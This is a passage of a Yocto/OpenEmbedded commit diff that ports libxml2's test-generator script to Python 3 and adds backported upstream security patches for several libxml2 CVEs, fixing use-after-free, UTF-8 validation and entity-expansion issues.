644+ else:
645+ need = 1
646+ if rtype != crtype:
647+ test.write("(%s)" % rtype)
648+ test.write("%s" % nam);
649+ test.write(");\n")
650+ if name in extra_post_call:
651+ test.write(" %s\n"% (extra_post_call[name]))
652+ test.write(" desret_%s(ret_val);\n" % t_ret[0])
653 else:
654- test.write("\n %s(" % (name));
655- need = 0;
656- for arg in t_args:
657- (nam, type, rtype, crtype, info) = arg;
658- if need:
659- test.write(", ")
660- else:
661- need = 1
662- if rtype != crtype:
663- test.write("(%s)" % rtype)
664- test.write("%s" % nam)
665- test.write(");\n")
666- if extra_post_call.has_key(name):
667- test.write(" %s\n"% (extra_post_call[name]))
668+ test.write("\n %s(" % (name));
669+ need = 0;
670+ for arg in t_args:
671+ (nam, type, rtype, crtype, info) = arg;
672+ if need:
673+ test.write(", ")
674+ else:
675+ need = 1
676+ if rtype != crtype:
677+ test.write("(%s)" % rtype)
678+ test.write("%s" % nam)
679+ test.write(");\n")
680+ if name in extra_post_call:
681+ test.write(" %s\n"% (extra_post_call[name]))
682
683 test.write(" call_tests++;\n");
684
685@@ -849,32 +849,32 @@ test_%s(void) {
686 i = 0;
687 for arg in t_args:
688 (nam, type, rtype, crtype, info) = arg;
689- # This is a hack to prevent generating a destructor for the
690- # 'input' argument in xmlTextReaderSetup. There should be
691- # a better, more generic way to do this!
692- if string.find(info, 'destroy') == -1:
693- test.write(" des_%s(n_%s, " % (type, nam))
694- if rtype != crtype:
695- test.write("(%s)" % rtype)
696- test.write("%s, %d);\n" % (nam, i))
697- i = i + 1;
698+ # This is a hack to prevent generating a destructor for the
699+ # 'input' argument in xmlTextReaderSetup. There should be
700+ # a better, more generic way to do this!
701+ if info.find('destroy') == -1:
702+ test.write(" des_%s(n_%s, " % (type, nam))
703+ if rtype != crtype:
704+ test.write("(%s)" % rtype)
705+ test.write("%s, %d);\n" % (nam, i))
706+ i = i + 1;
707
708 test.write(" xmlResetLastError();\n");
709 # Check the memory usage
710 if no_mem == 0:
711- test.write(""" if (mem_base != xmlMemBlocks()) {
712+ test.write(""" if (mem_base != xmlMemBlocks()) {
713 printf("Leak of %%d blocks found in %s",
714- xmlMemBlocks() - mem_base);
715- test_ret++;
716+\t xmlMemBlocks() - mem_base);
717+\t test_ret++;
718 """ % (name));
719- for arg in t_args:
720- (nam, type, rtype, crtype, info) = arg;
721- test.write(""" printf(" %%d", n_%s);\n""" % (nam))
722- test.write(""" printf("\\n");\n""")
723- test.write(" }\n")
724+ for arg in t_args:
725+ (nam, type, rtype, crtype, info) = arg;
726+ test.write(""" printf(" %%d", n_%s);\n""" % (nam))
727+ test.write(""" printf("\\n");\n""")
728+ test.write(" }\n")
729
730 for arg in t_args:
731- test.write(" }\n")
732+ test.write(" }\n")
733
734 test.write(" function_tests++;\n")
735 #
736@@ -882,7 +882,7 @@ test_%s(void) {
737 #
738 while nb_cond > 0:
739 test.write("#endif\n")
740- nb_cond = nb_cond -1
741+ nb_cond = nb_cond -1
742 if define == 1:
743 test.write("#endif\n")
744
745@@ -900,10 +900,10 @@ test_%s(void) {
746 for module in modules:
747 # gather all the functions exported by that module
748 try:
749- functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
750+ functions = ctxt.xpathEval("/api/symbols/function[@file='%s']" % (module))
751 except:
752- print "Failed to gather functions from module %s" % (module)
753- continue;
754+ print("Failed to gather functions from module %s" % (module))
755+ continue;
756
757 # iterate over all functions in the module generating the test
758 i = 0
759@@ -923,14 +923,14 @@ test_%s(void) {
760 # iterate over all functions in the module generating the call
761 for function in functions:
762 name = function.xpathEval('string(@name)')
763- if is_skipped_function(name):
764- continue
765- test.write(" test_ret += test_%s();\n" % (name))
766+ if is_skipped_function(name):
767+ continue
768+ test.write(" test_ret += test_%s();\n" % (name))
769
770 # footer
771 test.write("""
772 if (test_ret != 0)
773- printf("Module %s: %%d errors\\n", test_ret);
774+\tprintf("Module %s: %%d errors\\n", test_ret);
775 return(test_ret);
776 }
777 """ % (module))
778@@ -948,7 +948,7 @@ test.write(""" return(0);
779 }
780 """);
781
782-print "Generated test for %d modules and %d functions" %(len(modules), nb_tests)
783+print("Generated test for %d modules and %d functions" %(len(modules), nb_tests))
784
785 compare_and_save()
786
787@@ -960,11 +960,8 @@ for missing in missing_types.keys():
788 n = len(missing_types[missing])
789 missing_list.append((n, missing))
790
791-def compare_missing(a, b):
792- return b[0] - a[0]
793-
794-missing_list.sort(compare_missing)
795-print "Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list))
796+missing_list.sort(key=lambda a: a[0])
797+print("Missing support for %d functions and %d types see missing.lst" % (missing_functions_nr, len(missing_list)))
798 lst = open("missing.lst", "w")
799 lst.write("Missing support for %d types" % (len(missing_list)))
800 lst.write("\n")
801@@ -974,9 +971,9 @@ for miss in missing_list:
802 for n in missing_types[miss[1]]:
803 i = i + 1
804 if i > 5:
805- lst.write(" ...")
806- break
807- lst.write(" %s" % (n))
808+ lst.write(" ...")
809+ break
810+ lst.write(" %s" % (n))
811 lst.write("\n")
812 lst.write("\n")
813 lst.write("\n")
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
new file mode 100644
index 0000000000..5301d05323
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2016-3709.patch
@@ -0,0 +1,89 @@
1From c1ba6f54d32b707ca6d91cb3257ce9de82876b6f Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Sat, 15 Aug 2020 18:32:29 +0200
4Subject: [PATCH] Revert "Do not URI escape in server side includes"
5
6This reverts commit 960f0e275616cadc29671a218d7fb9b69eb35588.
7
8This commit introduced
9
10- an infinite loop, found by OSS-Fuzz, which could be easily fixed.
11- an algorithm with quadratic runtime
12- a security issue, see
13 https://bugzilla.gnome.org/show_bug.cgi?id=769760
14
15A better approach is to add an option not to escape URLs at all
16which libxml2 should have possibly done in the first place.
17
18CVE: CVE-2016-3709
19Upstream-Status: Backport [https://github.com/GNOME/libxml2/commit/c1ba6f54d32b707ca6d91cb3257ce9de82876b6f]
20Signed-off-by: Pawan Badganchi <Pawan.Badganchi@kpit.com>
21---
22 HTMLtree.c | 49 +++++++++++--------------------------------------
23 1 file changed, 11 insertions(+), 38 deletions(-)
24
25diff --git a/HTMLtree.c b/HTMLtree.c
26index 8d236bb35..cdb7f86a6 100644
27--- a/HTMLtree.c
28+++ b/HTMLtree.c
29@@ -706,49 +706,22 @@ htmlAttrDumpOutput(xmlOutputBufferPtr buf, xmlDocPtr doc, xmlAttrPtr cur,
30 (!xmlStrcasecmp(cur->name, BAD_CAST "src")) ||
31 ((!xmlStrcasecmp(cur->name, BAD_CAST "name")) &&
32 (!xmlStrcasecmp(cur->parent->name, BAD_CAST "a"))))) {
33+ xmlChar *escaped;
34 xmlChar *tmp = value;
35- /* xmlURIEscapeStr() escapes '"' so it can be safely used. */
36- xmlBufCCat(buf->buffer, "\"");
37
38 while (IS_BLANK_CH(*tmp)) tmp++;
39
40- /* URI Escape everything, except server side includes. */
41- for ( ; ; ) {
42- xmlChar *escaped;
43- xmlChar endChar;
44- xmlChar *end = NULL;
45- xmlChar *start = (xmlChar *)xmlStrstr(tmp, BAD_CAST "<!--");
46- if (start != NULL) {
47- end = (xmlChar *)xmlStrstr(tmp, BAD_CAST "-->");
48- if (end != NULL) {
49- *start = '\0';
50- }
51- }
52-
53- /* Escape the whole string, or until start (set to '\0'). */
54- escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+");
55- if (escaped != NULL) {
56- xmlBufCat(buf->buffer, escaped);
57- xmlFree(escaped);
58- } else {
59- xmlBufCat(buf->buffer, tmp);
60- }
61-
62- if (end == NULL) { /* Everything has been written. */
63- break;
64- }
65-
66- /* Do not escape anything within server side includes. */
67- *start = '<'; /* Restore the first character of "<!--". */
68- end += 3; /* strlen("-->") */
69- endChar = *end;
70- *end = '\0';
71- xmlBufCat(buf->buffer, start);
72- *end = endChar;
73- tmp = end;
74+ /*
75+ * the < and > have already been escaped at the entity level
76+ * And doing so here breaks server side includes
77+ */
78+ escaped = xmlURIEscapeStr(tmp, BAD_CAST"@/:=?;#%&,+<>");
79+ if (escaped != NULL) {
80+ xmlBufWriteQuotedString(buf->buffer, escaped);
81+ xmlFree(escaped);
82+ } else {
83+ xmlBufWriteQuotedString(buf->buffer, value);
84 }
85-
86- xmlBufCCat(buf->buffer, "\"");
87 } else {
88 xmlBufWriteQuotedString(buf->buffer, value);
89 }
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
new file mode 100644
index 0000000000..200f42091e
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3516.patch
@@ -0,0 +1,35 @@
1From 1358d157d0bd83be1dfe356a69213df9fac0b539 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Wed, 21 Apr 2021 13:23:27 +0200
4Subject: [PATCH] Fix use-after-free with `xmllint --html --push`
5
6Call htmlCtxtUseOptions to make sure that names aren't stored in
7dictionaries.
8
9Note that this issue only affects xmllint using the HTML push parser.
10
11Fixes #230.
12
13Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539]
14CVE: CVE-2021-3516
15Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
16---
17 xmllint.c | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/xmllint.c b/xmllint.c
21index 6ca1bf54d..dbef273a8 100644
22--- a/xmllint.c
23+++ b/xmllint.c
24@@ -2213,7 +2213,7 @@ static void parseAndPrintFile(char *filename, xmlParserCtxtPtr rectxt) {
25 if (res > 0) {
26 ctxt = htmlCreatePushParserCtxt(NULL, NULL,
27 chars, res, filename, XML_CHAR_ENCODING_NONE);
28- xmlCtxtUseOptions(ctxt, options);
29+ htmlCtxtUseOptions(ctxt, options);
30 while ((res = fread(chars, 1, pushsize, f)) > 0) {
31 htmlParseChunk(ctxt, chars, res, 0);
32 }
33--
34GitLab
35
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
new file mode 100644
index 0000000000..e88a8ae7c6
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3517.patch
@@ -0,0 +1,53 @@
1From bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2 Mon Sep 17 00:00:00 2001
2From: Joel Hockey <joel.hockey@gmail.com>
3Date: Sun, 16 Aug 2020 17:19:35 -0700
4Subject: [PATCH] Validate UTF8 in xmlEncodeEntities
5
6Code is currently assuming UTF-8 without validating. Truncated UTF-8
7input can cause out-of-bounds array access.
8
9Adds further checks to partial fix in 50f06b3e.
10
11Fixes #178
12Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2]
13CVE: CVE-2021-3517
14Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
15
16---
17 entities.c | 16 +++++++++++++++-
18 1 file changed, 15 insertions(+), 1 deletion(-)
19
20diff --git a/entities.c b/entities.c
21index 37b99a56..1a8f86f0 100644
22--- a/entities.c
23+++ b/entities.c
24@@ -704,11 +704,25 @@ xmlEncodeEntitiesInternal(xmlDocPtr doc, const xmlChar *input, int attr) {
25 } else {
26 /*
27 * We assume we have UTF-8 input.
28+ * It must match either:
29+ * 110xxxxx 10xxxxxx
30+ * 1110xxxx 10xxxxxx 10xxxxxx
31+ * 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
32+ * That is:
33+ * cur[0] is 11xxxxxx
34+ * cur[1] is 10xxxxxx
35+ * cur[2] is 10xxxxxx if cur[0] is 111xxxxx
36+ * cur[3] is 10xxxxxx if cur[0] is 1111xxxx
37+ * cur[0] is not 11111xxx
38 */
39 char buf[11], *ptr;
40 int val = 0, l = 1;
41
42- if (*cur < 0xC0) {
43+ if (((cur[0] & 0xC0) != 0xC0) ||
44+ ((cur[1] & 0xC0) != 0x80) ||
45+ (((cur[0] & 0xE0) == 0xE0) && ((cur[2] & 0xC0) != 0x80)) ||
46+ (((cur[0] & 0xF0) == 0xF0) && ((cur[3] & 0xC0) != 0x80)) ||
47+ (((cur[0] & 0xF8) == 0xF8))) {
48 xmlEntitiesErr(XML_CHECK_NOT_UTF8,
49 "xmlEncodeEntities: input not UTF-8");
50 if (doc != NULL)
51--
52GitLab
53
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
new file mode 100644
index 0000000000..40d3debea1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3518.patch
@@ -0,0 +1,112 @@
1From ac82a514e16eb81b4506e2cba1a1ee45b9f025b5 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Wed, 10 Jun 2020 16:34:52 +0200
4Subject: [PATCH 1/2] Don't recurse into xi:include children in
5 xmlXIncludeDoProcess
6
7Otherwise, nested xi:include nodes might result in a use-after-free
8if XML_PARSE_NOXINCNODE is specified.
9
10Found with libFuzzer and ASan.
11
12Upstream-Status: Backport [from fedora: https://bugzilla.redhat.com/show_bug.cgi?id=1954243]
13
14The upstream patch 752e5f71d7cea2ca5a7e7c0b8f72ed04ce654be4 has been modified,
15as to avoid unnecessary modifications to fallback files.
16
17CVE: CVE-2021-3518
18Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
19---
20 xinclude.c | 24 ++++++++++--------------
21 1 file changed, 10 insertions(+), 14 deletions(-)
22
23diff --git a/xinclude.c b/xinclude.c
24index ba850fa5..f260c1a7 100644
25--- a/xinclude.c
26+++ b/xinclude.c
27@@ -2392,21 +2392,19 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
28 * First phase: lookup the elements in the document
29 */
30 cur = tree;
31- if (xmlXIncludeTestNode(ctxt, cur) == 1)
32- xmlXIncludePreProcessNode(ctxt, cur);
33 while ((cur != NULL) && (cur != tree->parent)) {
34 /* TODO: need to work on entities -> stack */
35- if ((cur->children != NULL) &&
36- (cur->children->type != XML_ENTITY_DECL) &&
37- (cur->children->type != XML_XINCLUDE_START) &&
38- (cur->children->type != XML_XINCLUDE_END)) {
39- cur = cur->children;
40- if (xmlXIncludeTestNode(ctxt, cur))
41- xmlXIncludePreProcessNode(ctxt, cur);
42- } else if (cur->next != NULL) {
43+ if (xmlXIncludeTestNode(ctxt, cur) == 1) {
44+ xmlXIncludePreProcessNode(ctxt, cur);
45+ } else if ((cur->children != NULL) &&
46+ (cur->children->type != XML_ENTITY_DECL) &&
47+ (cur->children->type != XML_XINCLUDE_START) &&
48+ (cur->children->type != XML_XINCLUDE_END)) {
49+ cur = cur->children;
50+ continue;
51+ }
52+ if (cur->next != NULL) {
53 cur = cur->next;
54- if (xmlXIncludeTestNode(ctxt, cur))
55- xmlXIncludePreProcessNode(ctxt, cur);
56 } else {
57 if (cur == tree)
58 break;
59@@ -2416,8 +2414,6 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
60 break; /* do */
61 if (cur->next != NULL) {
62 cur = cur->next;
63- if (xmlXIncludeTestNode(ctxt, cur))
64- xmlXIncludePreProcessNode(ctxt, cur);
65 break; /* do */
66 }
67 } while (cur != NULL);
68--
692.32.0
70
71
72From 3ad5ac1e39e3cd42f838c1cd27ffd4e9b79e6121 Mon Sep 17 00:00:00 2001
73From: Nick Wellnhofer <wellnhofer@aevum.de>
74Date: Thu, 22 Apr 2021 19:26:28 +0200
75Subject: [PATCH 2/2] Fix user-after-free with `xmllint --xinclude --dropdtd`
76
77The --dropdtd option can leave dangling pointers in entity reference
78nodes. Make sure to skip these nodes when processing XIncludes.
79
80This also avoids scanning entity declarations and even modifying
81them inadvertently during XInclude processing.
82
83Move from a block list to an allow list approach to avoid descending
84into other node types that can't contain elements.
85
86Fixes #237.
87Upstream-Status: Backport
88CVE: CVE-2021-3518
89Signed-off-by: Jasper Orschulko <Jasper.Orschulko@iris-sensing.com>
90---
91 xinclude.c | 5 ++---
92 1 file changed, 2 insertions(+), 3 deletions(-)
93
94diff --git a/xinclude.c b/xinclude.c
95index f260c1a7..d7648529 100644
96--- a/xinclude.c
97+++ b/xinclude.c
98@@ -2397,9 +2397,8 @@ xmlXIncludeDoProcess(xmlXIncludeCtxtPtr ctxt, xmlDocPtr doc, xmlNodePtr tree) {
99 if (xmlXIncludeTestNode(ctxt, cur) == 1) {
100 xmlXIncludePreProcessNode(ctxt, cur);
101 } else if ((cur->children != NULL) &&
102- (cur->children->type != XML_ENTITY_DECL) &&
103- (cur->children->type != XML_XINCLUDE_START) &&
104- (cur->children->type != XML_XINCLUDE_END)) {
105+ ((cur->type == XML_DOCUMENT_NODE) ||
106+ (cur->type == XML_ELEMENT_NODE))) {
107 cur = cur->children;
108 continue;
109 }
110--
1112.32.0
112
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
new file mode 100644
index 0000000000..9e64c2a36d
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3537.patch
@@ -0,0 +1,50 @@
1From babe75030c7f64a37826bb3342317134568bef61 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Sat, 1 May 2021 16:53:33 +0200
4Subject: [PATCH] Propagate error in xmlParseElementChildrenContentDeclPriv
5
6Check return value of recursive calls to
7xmlParseElementChildrenContentDeclPriv and return immediately in case
8of errors. Otherwise, struct xmlElementContent could contain unexpected
9null pointers, leading to a null deref when post-validating documents
10which aren't well-formed and parsed in recovery mode.
11
12Fixes #243.
13
14Upstream-Status: Backport
15[https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61]
16CVE: CVE-2021-3537
17Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
18
19---
20 parser.c | 7 +++++++
21 1 file changed, 7 insertions(+)
22
23diff --git a/parser.c b/parser.c
24index b42e6043..73c27edd 100644
25--- a/parser.c
26+++ b/parser.c
27@@ -6208,6 +6208,8 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
28 SKIP_BLANKS;
29 cur = ret = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
30 depth + 1);
31+ if (cur == NULL)
32+ return(NULL);
33 SKIP_BLANKS;
34 GROW;
35 } else {
36@@ -6341,6 +6343,11 @@ xmlParseElementChildrenContentDeclPriv(xmlParserCtxtPtr ctxt, int inputchk,
37 SKIP_BLANKS;
38 last = xmlParseElementChildrenContentDeclPriv(ctxt, inputid,
39 depth + 1);
40+ if (last == NULL) {
41+ if (ret != NULL)
42+ xmlFreeDocElementContent(ctxt->myDoc, ret);
43+ return(NULL);
44+ }
45 SKIP_BLANKS;
46 } else {
47 elem = xmlParseName(ctxt);
48--
49GitLab
50
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
new file mode 100644
index 0000000000..1f392b4cd7
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2021-3541.patch
@@ -0,0 +1,73 @@
1From 8598060bacada41a0eb09d95c97744ff4e428f8e Mon Sep 17 00:00:00 2001
2From: Daniel Veillard <veillard@redhat.com>
3Date: Thu, 13 May 2021 14:55:12 +0200
4Subject: [PATCH] Patch for security issue CVE-2021-3541
5
6This is relapted to parameter entities expansion and following
7the line of the billion laugh attack. Somehow in that path the
8counting of parameters was missed and the normal algorithm based
9on entities "density" was useless.
10
11Upstream-Status: Backport
12[https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e]
13CVE: CVE-2021-3541
14Signed-off-by: Steve Sakoman <steve@sakoman.com>
15
16---
17 parser.c | 26 ++++++++++++++++++++++++++
18 1 file changed, 26 insertions(+)
19
20diff --git a/parser.c b/parser.c
21index f5e5e169..c9312fa4 100644
22--- a/parser.c
23+++ b/parser.c
24@@ -140,6 +140,7 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
25 xmlEntityPtr ent, size_t replacement)
26 {
27 size_t consumed = 0;
28+ int i;
29
30 if ((ctxt == NULL) || (ctxt->options & XML_PARSE_HUGE))
31 return (0);
32@@ -177,6 +178,28 @@ xmlParserEntityCheck(xmlParserCtxtPtr ctxt, size_t size,
33 rep = NULL;
34 }
35 }
36+
37+ /*
38+ * Prevent entity exponential check, not just replacement while
39+ * parsing the DTD
40+ * The check is potentially costly so do that only once in a thousand
41+ */
42+ if ((ctxt->instate == XML_PARSER_DTD) && (ctxt->nbentities > 10000) &&
43+ (ctxt->nbentities % 1024 == 0)) {
44+ for (i = 0;i < ctxt->inputNr;i++) {
45+ consumed += ctxt->inputTab[i]->consumed +
46+ (ctxt->inputTab[i]->cur - ctxt->inputTab[i]->base);
47+ }
48+ if (ctxt->nbentities > consumed * XML_PARSER_NON_LINEAR) {
49+ xmlFatalErr(ctxt, XML_ERR_ENTITY_LOOP, NULL);
50+ ctxt->instate = XML_PARSER_EOF;
51+ return (1);
52+ }
53+ consumed = 0;
54+ }
55+
56+
57+
58 if (replacement != 0) {
59 if (replacement < XML_MAX_TEXT_LENGTH)
60 return(0);
61@@ -7963,6 +7986,9 @@ xmlParsePEReference(xmlParserCtxtPtr ctxt)
62 xmlChar start[4];
63 xmlCharEncoding enc;
64
65+ if (xmlParserEntityCheck(ctxt, 0, entity, 0))
66+ return;
67+
68 if ((entity->etype == XML_EXTERNAL_PARAMETER_ENTITY) &&
69 ((ctxt->options & XML_PARSE_NOENT) == 0) &&
70 ((ctxt->options & XML_PARSE_DTDVALID) == 0) &&
71--
72GitLab
73
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
new file mode 100644
index 0000000000..7fc243eec1
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308-fix-regression.patch
@@ -0,0 +1,98 @@
1From 646fe48d1c8a74310c409ddf81fe7df6700052af Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Tue, 22 Feb 2022 11:51:08 +0100
4Subject: [PATCH] Fix --without-valid build
5
6Regressed in commit 652dd12a.
7---
8 valid.c | 58 ++++++++++++++++++++++++++++-----------------------------
9 1 file changed, 29 insertions(+), 29 deletions(-)
10---
11
12From https://github.com/GNOME/libxml2.git
13 commit 646fe48d1c8a74310c409ddf81fe7df6700052af
14
15CVE: CVE-2022-23308
16Upstream-Status: Backport
17
18Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
19
20diff --git a/valid.c b/valid.c
21index 8e596f1d..9684683a 100644
22--- a/valid.c
23+++ b/valid.c
24@@ -479,35 +479,6 @@ nodeVPop(xmlValidCtxtPtr ctxt)
25 return (ret);
26 }
27
28-/**
29- * xmlValidNormalizeString:
30- * @str: a string
31- *
32- * Normalize a string in-place.
33- */
34-static void
35-xmlValidNormalizeString(xmlChar *str) {
36- xmlChar *dst;
37- const xmlChar *src;
38-
39- if (str == NULL)
40- return;
41- src = str;
42- dst = str;
43-
44- while (*src == 0x20) src++;
45- while (*src != 0) {
46- if (*src == 0x20) {
47- while (*src == 0x20) src++;
48- if (*src != 0)
49- *dst++ = 0x20;
50- } else {
51- *dst++ = *src++;
52- }
53- }
54- *dst = 0;
55-}
56-
57 #ifdef DEBUG_VALID_ALGO
58 static void
59 xmlValidPrintNode(xmlNodePtr cur) {
60@@ -2636,6 +2607,35 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
61 (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
62 xmlFree((char *)(str));
63
64+/**
65+ * xmlValidNormalizeString:
66+ * @str: a string
67+ *
68+ * Normalize a string in-place.
69+ */
70+static void
71+xmlValidNormalizeString(xmlChar *str) {
72+ xmlChar *dst;
73+ const xmlChar *src;
74+
75+ if (str == NULL)
76+ return;
77+ src = str;
78+ dst = str;
79+
80+ while (*src == 0x20) src++;
81+ while (*src != 0) {
82+ if (*src == 0x20) {
83+ while (*src == 0x20) src++;
84+ if (*src != 0)
85+ *dst++ = 0x20;
86+ } else {
87+ *dst++ = *src++;
88+ }
89+ }
90+ *dst = 0;
91+}
92+
93 static int
94 xmlIsStreaming(xmlValidCtxtPtr ctxt) {
95 xmlParserCtxtPtr pctxt;
96--
972.35.1
98
diff --git a/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
new file mode 100644
index 0000000000..bf5604e81a
--- /dev/null
+++ b/meta/recipes-core/libxml/libxml2/CVE-2022-23308.patch
@@ -0,0 +1,204 @@
1From 8b66850de350f0fcd786ae776a65ba15a5999e50 Mon Sep 17 00:00:00 2001
2From: Nick Wellnhofer <wellnhofer@aevum.de>
3Date: Tue, 8 Feb 2022 03:29:24 +0100
4Subject: [PATCH] Use-after-free of ID and IDREF attributes
5
6If a document is parsed with XML_PARSE_DTDVALID and without
7XML_PARSE_NOENT, the value of ID attributes has to be normalized after
8potentially expanding entities in xmlRemoveID. Otherwise, later calls
9to xmlGetID can return a pointer to previously freed memory.
10
11ID attributes which are empty or contain only whitespace after
12entity expansion are affected in a similar way. This is fixed by
13not storing such attributes in the ID table.
14
15The test to detect streaming mode when validating against a DTD was
16broken. In connection with the defects above, this could result in a
17use-after-free when using the xmlReader interface with validation.
18Fix detection of streaming mode to avoid similar issues. (This changes
19the expected result of a test case. But as far as I can tell, using the
20XML reader with XIncludes referencing the root document never worked
21properly, anyway.)
22
23All of these issues can result in denial of service. Using xmlReader
24with validation could result in disclosure of memory via the error
25channel, typically stderr. The security impact of xmlGetID returning
26a pointer to freed memory depends on the application. The typical use
27case of calling xmlGetID on an unmodified document is not affected.
28
29Upstream-Status: Backport
30[https://gitlab.gnome.org/GNOME/libxml2/-/commit/652dd12a858989b14eed4e84e453059cd3ba340e]
31
32The upstream patch 652dd12a858989b14eed4e84e453059cd3ba340e has been modified
33to skip the patch to the testsuite result (result/XInclude/ns1.xml.rdr), as
34this particular test does not exist in v2.9.10 (it was added later).
35
36CVE: CVE-2022-23308
37Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
38
39---
40 valid.c | 88 +++++++++++++++++++++++++++++++++++----------------------
41 1 file changed, 55 insertions(+), 33 deletions(-)
42
43diff --git a/valid.c b/valid.c
44index 07963e7..ee75311 100644
45--- a/valid.c
46+++ b/valid.c
47@@ -479,6 +479,35 @@ nodeVPop(xmlValidCtxtPtr ctxt)
48 return (ret);
49 }
50
51+/**
52+ * xmlValidNormalizeString:
53+ * @str: a string
54+ *
55+ * Normalize a string in-place.
56+ */
57+static void
58+xmlValidNormalizeString(xmlChar *str) {
59+ xmlChar *dst;
60+ const xmlChar *src;
61+
62+ if (str == NULL)
63+ return;
64+ src = str;
65+ dst = str;
66+
67+ while (*src == 0x20) src++;
68+ while (*src != 0) {
69+ if (*src == 0x20) {
70+ while (*src == 0x20) src++;
71+ if (*src != 0)
72+ *dst++ = 0x20;
73+ } else {
74+ *dst++ = *src++;
75+ }
76+ }
77+ *dst = 0;
78+}
79+
80 #ifdef DEBUG_VALID_ALGO
81 static void
82 xmlValidPrintNode(xmlNodePtr cur) {
83@@ -2607,6 +2636,24 @@ xmlDumpNotationTable(xmlBufferPtr buf, xmlNotationTablePtr table) {
84 (xmlDictOwns(dict, (const xmlChar *)(str)) == 0))) \
85 xmlFree((char *)(str));
86
87+static int
88+xmlIsStreaming(xmlValidCtxtPtr ctxt) {
89+ xmlParserCtxtPtr pctxt;
90+
91+ if (ctxt == NULL)
92+ return(0);
93+ /*
94+ * These magic values are also abused to detect whether we're validating
95+ * while parsing a document. In this case, userData points to the parser
96+ * context.
97+ */
98+ if ((ctxt->finishDtd != XML_CTXT_FINISH_DTD_0) &&
99+ (ctxt->finishDtd != XML_CTXT_FINISH_DTD_1))
100+ return(0);
101+ pctxt = ctxt->userData;
102+ return(pctxt->parseMode == XML_PARSE_READER);
103+}
104+
105 /**
106 * xmlFreeID:
107 * @not: A id
108@@ -2650,7 +2697,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
109 if (doc == NULL) {
110 return(NULL);
111 }
112- if (value == NULL) {
113+ if ((value == NULL) || (value[0] == 0)) {
114 return(NULL);
115 }
116 if (attr == NULL) {
117@@ -2681,7 +2728,7 @@ xmlAddID(xmlValidCtxtPtr ctxt, xmlDocPtr doc, const xmlChar *value,
118 */
119 ret->value = xmlStrdup(value);
120 ret->doc = doc;
121- if ((ctxt != NULL) && (ctxt->vstateNr != 0)) {
122+ if (xmlIsStreaming(ctxt)) {
123 /*
124 * Operating in streaming mode, attr is gonna disappear
125 */
126@@ -2820,6 +2867,7 @@ xmlRemoveID(xmlDocPtr doc, xmlAttrPtr attr) {
127 ID = xmlNodeListGetString(doc, attr->children, 1);
128 if (ID == NULL)
129 return(-1);
130+ xmlValidNormalizeString(ID);
131
132 id = xmlHashLookup(table, ID);
133 if (id == NULL || id->attr != attr) {
